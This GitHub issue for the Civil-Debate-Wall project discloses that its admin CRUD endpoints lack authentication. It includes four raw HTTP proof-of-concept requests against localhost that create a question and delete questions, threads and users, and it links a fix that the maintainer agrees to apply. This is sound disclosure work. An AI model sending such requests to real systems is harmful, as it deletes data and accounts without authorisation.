search

localprojects / Civil-Debate-Wall

http://www.civildebatewall.com/
7 stars 3 forks source link

Unauthenticated admin_crud.py requests #9

Open Chiggins opened 9 years ago

Chiggins commented 9 years ago

There is a vulnerability that allows an unauthenticated user the ability to create questions, delete questions, delete threads, and delete users. This could be accomplished by hitting each REST endpoint.

This commit adds in authorization for these endpoints. A user must be logged in as an administrator to be able to perform these actions.

Unauthenticated create question For this to work, a proper category ID and author ID must be specified.

POST /admin/crud/questions HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
text=Test+Create+3&category=4ea89d9a714375e907000005&author=54ee291d0bfe3c54d90ca33c

Unauthenticated delete question Must provide ID of question to be deleted

DELETE /admin/crud/questions/54f8cb240bfe3c03b19de69d HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Unauthenticated delete thread Must provide ID of thread to be deleted

DELETE /admin/crud/threads/53c0461c0bfe3c0cb100000a HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Unauthenticated delete user Must provide ID of user to be deleted

DELETE /admin/crud/users/54f8ce460bfe3cde5aa41ca0 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Chiggins commented 9 years ago

My git-fu skills aren't that great with all the changes we've been making on our backend, but here's my commit that fixes these issues. Hopefully you guys make the same changes: https://github.com/CAS-IT/ILSTUViews/commit/bf88a7728de5d9ff6745c7c07e732a76d60c279f

Notice that I didn't do a full code audit or security assessment on the software, just happened to notice this one and fix it.

cybertoast commented 9 years ago

@Chiggins : thanks much! I'll verify your changes and apply them.